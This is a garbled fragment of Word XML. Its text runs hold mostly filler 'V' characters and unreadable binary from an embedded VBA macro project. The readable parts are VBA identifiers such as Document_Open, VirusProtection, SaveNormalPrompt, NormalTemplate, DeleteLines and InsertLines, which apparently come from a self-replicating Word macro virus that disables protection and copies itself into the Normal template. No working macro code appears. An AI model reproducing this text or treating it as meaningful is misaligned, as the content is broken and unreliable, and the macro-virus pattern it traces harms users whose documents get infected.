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</w:t>
        <w:b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  <w:br/>
        <w:t>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  <w:br/>
        <w:t>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</w:t>
        <w:br/>
        <w:t>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</w:t>
        <w:br/>
        <w:t>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</w:t>
        <w:br/>
        <w:t>VVV</w:t>
        <w:br/>
        <w:t>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</w:t>
        <w:br/>
        <w:t>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</w:t>
        <w:br/>
        <w:t>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</w:t>
        <w:b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</w:t>
        <w:br/>
        <w:t>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</w:t>
        <w:br/>
        <w:t>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</w:t>
        <w:br/>
        <w:t>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</w:t>
        <w:br/>
        <w:t>VVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV</w:t>
        <w:br/>
        <w:t>VVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV</w:t>
        <w:br/>
        <w:t>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</w:t>
        <w:br/>
        <w:t>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</w:t>
        <w:br/>
        <w:t>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</w:t>
        <w:br/>
        <w:t>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</w:t>
        <w:br/>
        <w:t>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</w:t>
        <w:br/>
        <w:t>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</w:t>
        <w:br/>
        <w:t>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</w:t>
        <w:br/>
        <w:t>VVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV</w:t>
        <w:br/>
        <w:t>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</w:t>
        <w:br/>
        <w:t>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</w:t>
        <w:br/>
        <w:t>VVVVVVVVVVV</w:t>
        <w:br/>
        <w:t>VVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV</w:t>
        <w:br/>
        <w:t>VVVVVVVVVVV</w:t>
        <w:br/>
        <w:t>VVVVVVVVVVV</w:t>
        <w:br/>
        <w:t>VVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV</w:t>
        <w:br/>
        <w:t>VVVVVVVVVVV</w:t>
        <w:br/>
        <w:t>VVVVVVVVVVV</w:t>
        <w:br/>
        <w:t>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</w:t>
        <w:br/>
        <w:t>VVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV</w:t>
        <w:br/>
        <w:t>VVVVVVVVVVVVVVVVVVVVVVVVVVVVV</w:t>
        <w:br/>
        <w:t>VVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV</w:t>
        <w:br/>
        <w:br/>
        <w:t>VVVVVVVV</w:t>
        <w:br/>
        <w:t>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#D#0#4#C#-#5#B#F#A#-#1#0#1#B#-#B#D#E#5#-#0#0#A#A#0#0#4#4#D#E#5#2#}###2#.#7###0###C#:#\#P#r#o#g#r#a#m# #F#i#l#e#s#\#C#o#m#m#o#n# #F#i#l#e#s#\#M#i#c#r#o#s#o#f#t# #S#h#a#r#e#d#\#O#F#F#I#C#E#1#5#\#M#S#O#.#D#L#L###M#i#c#r#o#s#o#f#t# #O#f#f#i#c#e# #1#5#.#0# #O#b#j#e#c#t# #L#i#b#r#a#r#y###########################################"#������####��###�g�#����������������##����������������������������������������������####################g�####T#h#i#s#D#o#c#u#m#e#n#t###1#l#6#7#b#c#e#7#1#9#��%###T#h#i#s#D#o#c#u#m#e#n#t#���4###########�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#�=��I�G��3J�M�3����####����`###�#####)#####�.####Word�k`###VBA��`###Win16�~`###Win32#`###Win64x`###Mac��`###VBA6�#`###VBA7�#`###����1p#`###stdole�``###Project-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`#</w:t>
        <w:tab/>
        <w:t>�##�###_Evaluate#�`###Normal��`##�##�###Office#u`###Documentj�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Document_Open�`##�##�###Application�*`##�##�###DisplayStatusBar��`##�##�###Options��`##�##�###VirusProtectionoD`##�##�###SaveNormalPromptʼ`##�##�###MyCode��`#</w:t>
        <w:tab/>
        <w:t>�##�###VBProjectOh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VBComponents</w:t>
        <w:br/>
        <w:t>'`#</w:t>
        <w:br/>
        <w:t>�##�###CodeModule�#`##�##�###Lines��`##�##�###Host��`##�##�###NormalTemplateq�`##�##�###ActiveDocument�\`##�##�###DeleteLin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CountOfLines!\`##�##�###InsertLines��`##�##�###SaveAsf;`##�##�###FullNameО`##��##T###������������������������������������ ###��"#����%#####������(###��####��####��*###��####################################ID="{40D63464-8FE5-4343-B5BF-0F2D1C564291}"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Document=ThisDocume�###�###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VVVVVVVVVVVVVVVVVVVVVVVVVVVV</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>VVVVVVVVVVVVVVVVVVVVVVVVVVVV</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>VVVVVVVVVVVVVVVVVVVVVV</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>VVVVVVVVVVVVVVVVVVVV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VVVVVVVVVVVVVVVVVVV</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>VVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV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VVVVVVVVVV</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>VVVVVVVVVVVVVVVVVVVVVVVVVV</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>VVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV</w:t>
        <w:br/>
        <w:t>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